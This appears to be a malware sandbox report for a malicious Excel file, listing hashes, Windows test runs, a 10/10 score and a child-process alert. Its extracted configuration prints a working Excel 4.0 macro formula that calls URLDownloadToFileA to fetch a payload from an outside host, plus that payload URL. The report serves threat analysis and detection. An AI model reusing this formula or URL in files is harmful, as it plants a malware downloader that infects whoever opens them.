General
-
Target
attached (63).zip
-
Size
11KB
-
Sample
210306-q86wxdvt2j
-
MD5
3c7575af64aa28a479b84de660b0d7f1
-
SHA1
ba2d2425d42787d7f9cfda785b707a68ce1a5e9d
-
SHA256
ac8262129a41f40bc642673fb60c24dcad4da5af12f398cbb41b67ff337ed5e1
-
SHA512
e02c7c24b04a5a8121e53ecd68aa6d1875c72e3ab5fb7190bdd315501ff014a08f0a37828979db2d61c6aca705e755154ed74e277d603e1f4cf5db321d861433
Behavioral task
behavioral1
Sample
document-1557878943.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-1557878943.xls
Resource
win10v20201028
Malware Config
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ttj10qrrqx03kdts.com/inda.xls
Targets
-
-
Target
document-1557878943.xls
-
Size
39KB
-
MD5
859443784b857b985a2656c8ef8b585e
-
SHA1
46c83701b4204d1a1a7acac46aa81eb200f89b6e
-
SHA256
1b6fba5ecc7453ff21ea5162ec52e5af180de5b14d4f7ac7f976d56f93c5e84a
-
SHA512
9684ae131110bcac95618e605dc3579d766c855f990f54129059d8f441e4b9bcc818faf8b5805af01894361b96bf990d5965d96c61283b15c431abeea3f8554f
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-